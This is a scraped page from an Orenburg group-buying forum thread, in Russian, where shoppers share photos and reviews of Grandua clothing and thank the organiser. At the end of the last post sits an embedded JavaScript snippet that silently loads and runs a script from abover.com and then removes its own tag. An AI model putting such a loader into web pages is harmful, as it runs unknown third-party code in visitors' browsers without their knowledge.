Совместные покупки! Оренбург!!!
Добро пожаловать на наш форум о совместных покупках в Оренбурге и не только!
Совместные покупки! Оренбург!!!
Добро пожаловать на наш форум о совместных покупках в Оренбурге и не только!



 
ФорумПорталПоследние изображенияРегистрацияВход
Наш новый сайт!
ВНИМАНИЕ
ВНИМАНИЕ!

При оплате через "Сбербанк-OnLine" - ничего не пишите в комментариях!!! При оплате через кассира банка - говорите, что пополняете счет!
В противном случае платеж не будет засчитан!
Дарим подарки!
Условия читайте в теме
Узнай местонахождение
Навигатор по разделам
Важная информация!
Действующие закупки
Магазинчик
Пристрой из СП
Доска объявлений
Благотворительность
Беседка
Клубы по интересам
Мама
Малыш
Последние темы
» Интернет-магазин http://markethot.ru/
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Чт Ноя 05, 2015 8:57 am

» «Издательский Дом Мещерякова» предлагает сотрудничество!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Чт Окт 29, 2015 3:31 pm

» Аэратор Water Saving.
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Вт Окт 27, 2015 4:33 pm

» Shtoly-женская одежда оптом. Организаторы давайте сотрудничать!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Гость Пн Окт 26, 2015 11:40 am

» Компания НогиШоп предлагает сотрудничество!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Вс Окт 25, 2015 8:38 am

» Махровые полотенца из 100% хлопка!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Ср Окт 21, 2015 1:24 pm

» Сковорода Смайлы и Снежколеп оптом!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Вс Окт 18, 2015 4:36 pm

» Gepur.com.ua - магазин одежды. Приглашаем организаторов СП
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор gepur Пт Окт 16, 2015 4:30 pm

» ЖЕНСКАЯ И ДЕТСКАЯ ОБУВЬ ОТ ПРОИЗВОДИТЕЛЯ
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Вт Окт 13, 2015 8:41 pm

» Рукавички из натурального меха от производителя
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор penkinairisha Ср Сен 30, 2015 5:39 pm

» Детский вязаный трикотаж Golden Kids
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Ср Сен 30, 2015 8:05 am

» Фабрика «ТЕКСТИЛЬ-ОК!» http://texstil-ok.ru/
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор penkinairisha Вт Сен 29, 2015 8:15 am

» Акция для организаторов СП, семена Биотехника от производителя.
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Вт Сен 22, 2015 6:02 am

» Всё для организатора совместной покупки!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Пн Сен 21, 2015 5:40 am

» Компания BeautyHairFull приглашает к сотрудничеству!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Ср Сен 16, 2015 2:05 pm

» Компания BeautyHairFull приглашает к сотрудничеству!
Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeавтор Elena-OrgPlus Ср Сен 16, 2015 2:04 pm

Вверх страницы

Вниз страницы

Поделиться
 

 Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)

Предыдущая тема Следующая тема Перейти вниз 
На страницу : Предыдущий  1, 2, 3  Следующий
АвторСообщение
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeСб Апр 20, 2013 12:39 pm

Первое сообщение в теме :

Девочки!!! добавляем фото, делимся впечатлениями!!!

[center][Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]

[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]


Последний раз редактировалось: Nastena90R (Чт Апр 25, 2013 5:51 pm), всего редактировалось 2 раз(а)
Вернуться к началу Перейти вниз

АвторСообщение
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeСб Май 18, 2013 7:00 am

ИришкаМ пишет:
Настя, доходоит до смешного, не могу найти фотоаппарат, как только найду его, где нибудь в шкафу или в мешке с картошкой girl_haha обязательно выложу!!!!!

ОЙ..НАСМЕШИЛА)))) girl_haha ag.gif ладненько, хорошо!!! буду с нетерпением ждатттьььььь)))) Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПн Май 20, 2013 10:26 am

ДЕВОЧКИ! НЕ ЗАБЫВАЕМ ДЕЛИТЬСЯ ВПЕЧАТЛЕНИЯМИ ОТ ВТОРОЙ ЗАКУПКИ!!! Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПн Май 20, 2013 11:23 am

Хочу отписаться по поводу второй закупки!!! Заказ делала от имени мамы, т.к. не могла вспомнить свой пароль... blink
ЗАКАЗЫВАЛА 2 БЛУЗЫ, ПИДЖАК И ЮБКУ!!! ВСЁ ПРОСТО ШИКАРНОЕ!!! ИДЕАЛЬНО СИДИТ! ХОРОШО СШИТО!!! ПРЯМ ФИРМаааа!!!!! у меня от покупок из этой закупки только положительные эмоции!!! ВСЕМ СОВЕТУЮ ОБРАТИТЬ НА НЕЁ ВНИМАНИЕ!!! такие качественные вещи, что даже не во всех магазинах "укупишь"!!!. ТОЛЬКО ОБЯЗАТЕЛЬНО НУЖНО СМОТРЕТЬ РАЗМЕРНУЮ ТАБЛИЦУ! Я ПО НЕЙ ОРИЕНТИРОВАЛАСЬ... И ВЗЯЛА СЕБЕ ВЕЩИ 48-50!
НАСТЁН, СПАСИБО ЗА ЗАКУПКУ! Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 КАК ТОЛЬКО НАРЯЖУСЬ ПО ПОЛНОЙ ПРОГРАММЕ-ВЫЛОЖУ ФОТО!!! Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПн Май 20, 2013 3:01 pm

Кэт пишет:
Хочу отписаться по поводу второй закупки!!! Заказ делала от имени мамы, т.к. не могла вспомнить свой пароль... blink
ЗАКАЗЫВАЛА 2 БЛУЗЫ, ПИДЖАК И ЮБКУ!!! ВСЁ ПРОСТО ШИКАРНОЕ!!! ИДЕАЛЬНО СИДИТ! ХОРОШО СШИТО!!! ПРЯМ ФИРМаааа!!!!! у меня от покупок из этой закупки только положительные эмоции!!! ВСЕМ СОВЕТУЮ ОБРАТИТЬ НА НЕЁ ВНИМАНИЕ!!! такие качественные вещи, что даже не во всех магазинах "укупишь"!!!. ТОЛЬКО ОБЯЗАТЕЛЬНО НУЖНО СМОТРЕТЬ РАЗМЕРНУЮ ТАБЛИЦУ! Я ПО НЕЙ ОРИЕНТИРОВАЛАСЬ... И ВЗЯЛА СЕБЕ ВЕЩИ 48-50!
НАСТЁН, СПАСИБО ЗА ЗАКУПКУ! Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 КАК ТОЛЬКО НАРЯЖУСЬ ПО ПОЛНОЙ ПРОГРАММЕ-ВЫЛОЖУ ФОТО!!! Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012

Катюш, спасибо большое за такой отзыв!!! ТЕПЕРЬ БУДУ С НЕТЕРПЕНИЕМ ЖДАТЬ ФОТОГРАФИЙ!!! Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 :Спасибо:
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПн Май 20, 2013 8:23 pm

[img][Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку] [/img]


Извиняюсь за размер фото))))Просто меня торопили))))Заказывала пиджак (44)и футболку(42-44) на свой 44-46 размер,все село идеально,а если бы я еще и успела бы погладить его хорошенько,то все было бы просто супер))))))..Спасибо за закупку,Настя!!!!!!!!))))))))
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeВт Май 21, 2013 4:50 am

анастасия555 пишет:
[img][Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку] [/img]


Извиняюсь за размер фото))))Просто меня торопили))))Заказывала пиджак (44)и футболку(42-44) на свой 44-46 размер,все село идеально,а если бы я еще и успела бы погладить его хорошенько,то все было бы просто супер))))))..Спасибо за закупку,Настя!!!!!!!!))))))))

Настён! спасибо большое за Хвасты!!!! Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 (я попросила для тебя медальку за "Лучшие хвасты"))) Хорошо, что ты больше пиджак не купила!)) утонула бы) сидит очень отлично!!!!! girl_in_love. КСТАТИ, ХОЧУ СРАЗУ ВСЕМ ДЕВОЧКАМ НАПИСАТЬ, ЧТО ПРОВЕРЬТЕ СРАЗУ ВСЕ ПУГОВКИ НА ПИДЖАКАХ! они там слабо очень пришиты! (будто просто намётаны), НО ЕСТЬ И "+" ПОТЕРЯЕТЕ ЕСЛИ ПУГОВКУ, ТАМ, КАК В МАГАЗИНЕ-НА БИРКЕ ВИСИТ В ПАКЕТИКЕ ЕЩЁ ОДНА)) но лучше не терять) 100
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeВт Май 21, 2013 7:14 am

Спасибо,Настен 100 за медальку.Кстати у меня нормально пришиты:)
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeВт Май 21, 2013 7:18 am

анастасия555 пишет:
Спасибо,Настен 100 за медальку.Кстати у меня нормально пришиты:)

Тебе повезло!!! girl_valentine
Мотя и Кэт перешивали уже себе пуговки))) поэтому предупредила! sarcastic
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПн Июн 03, 2013 5:44 am

Моя подружка Юлия в пиджаке и блузе из закупки.

[img][Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку] [/img]

[img][Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку] [/img]

[img][Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку] [/img]
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПт Июн 14, 2013 3:07 pm

мои майки!!!100 очень довольна качеством!!! 

[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]

Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeВт Июн 25, 2013 10:50 am

Девочки! где же Ваши ХВАСТЫ???sad.gif
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeВт Июл 02, 2013 9:05 am

[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]



моя соседка Лия Хасанова в футболке "Позитив"
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeСб Июл 06, 2013 8:59 am

Блуза "Оскар"
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]

Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПн Июл 08, 2013 8:05 am

мотя пишет:
Блуза "Оскар"
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]


Мария, спасибо большое за хвастики!Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeЧт Июл 25, 2013 7:43 am

вот мой хваст блузой!!! спасибо, за закупку!!!Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]

Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeЧт Июл 25, 2013 1:35 pm

Кэт пишет:
вот мой хваст блузой!!! спасибо, за закупку!!!Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]


спасибо большое за хвастик!!!Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012  Шикарно выглядишь!!!girl_in_love. 
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПт Авг 02, 2013 7:15 pm

Настена спасибо за закупку! Шорты оказались прям как на меня сшиты!
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeВт Авг 06, 2013 12:50 pm

Настя спасибо, все шикарно подошло, кроме одного платья, оказалось маловато, но я его уже пристроила. жаль нет фотоаппарата. Очень красивая и качественная одежда, я довольна.
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeСб Авг 17, 2013 10:00 pm

Девочки, спасибо за отзывы!!! очень приятно!!! жду Ваших заказиков! НУ И,КОНЕЧНО, фото!!!одежда действительно-очень достойная!!!) Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012 Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 3768816012
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПт Окт 04, 2013 3:05 pm

[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]


Оксана Сержантова в блузе "Палермо".
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeПн Окт 21, 2013 2:53 pm

Муж разрешил его сфотографировать только ТАК:)))) blink  "Модель" МОЯ!) blink 
На нём джемпер "Hase", размер М. 
Качеством остались довольны, угодила мужу))
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]

Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeЧт Окт 31, 2013 11:54 am

[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]




Лия Хасанова в платье "Шамбала"


[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]



Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeЧт Окт 31, 2013 11:56 am

[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]




Лия Хасанова в платье "Бьянка"


[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]



Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeЧт Ноя 07, 2013 5:54 am

Получила заказик - моему счастью нет предела!Пока своих фоток нет, правда, но могу отметить. что вещи все в точности как на картинках. Качество очень хорошее.girl_in_love. 
Заказывала следующие товары:
1. Джемпер Бостон
[Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]  " />
Ношу всегда 48 размер, поэтому заказала этот джемпер в размере 46-48. Смотрится отлично, можно даже было бы чуток поменьше взять (например, 46 - если был бы такой размер). Материал очень приятный к телу.

2. Леггинцы-стрелка
[Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]  " />
Размер отлично подошёл - как на меня сшиты! При росте 176  - длина подошла замечательно! Посадка высокая.Ткань плотная, тянется плохо. Прострочка "стрелка" сделана и спереди и сзади, прошито всё качественно. В общем, леггинцами довольна - как раз в позднюю осень носить и носить!

3. Юбка-карандаш Леора
[Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]  " />
Когда только начала мерить - почти расстроилась: ткань тянется оч плохо - еле застегнула на себе....Потом чуток походив в ней успокоилась - села юбочка отлично, подчёркивает только достоинства фигуры!По швам не трещит=) Один минус: одевать очень не удобно, так как застёгивается на замок, который вшит по всей длине сзади.....надо приноровиться к такому замку=)зато можно самой регулировать вырез сзади: можно застегнуть до конца, можно замочек поднять и сделать лёгкий разрезик.....
Вернуться к началу Перейти вниз
Гость
Гость
avatar


Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 Empty
СообщениеТема: Re: Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)   Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R) - Страница 2 I_icon_minitimeЧт Ноя 07, 2013 6:01 am

Nastena90R пишет:
[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]




Лия Хасанова в платье "Бьянка"


[Вы должны быть зарегистрированы и подключены, чтобы видеть эту ссылку]



На Лилии сидит гораздо лучше чем на модели girl_haha  очень здорово!
(function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();
Вернуться к началу Перейти вниз
 

Хвастаемся одеждой фирмы "Grandua" (орг. Nastena90R)

Предыдущая тема Следующая тема Вернуться к началу 
Страница 2 из 3На страницу : Предыдущий  1, 2, 3  Следующий

 Похожие темы

-
» Хвастаемся одеждой фирмы "МОДНЫЙ ОСТРОВ"!!! (ОРГ. Nastena90R)
» Хвастаемся одеждой фирмы "Г.е.п.ю.р""
» Хвастаемся постельным бельём фирмы Ivselena орг. Nastena90R
» Хвасты одеждой фирмы Анжела Риччи
» Хвастаемся одеждой "Серебряная ладья"

Права доступа к этому форуму:Вы не можете отвечать на сообщения
Совместные покупки! Оренбург!!! :: Действующие закупки :: Хвастаемся-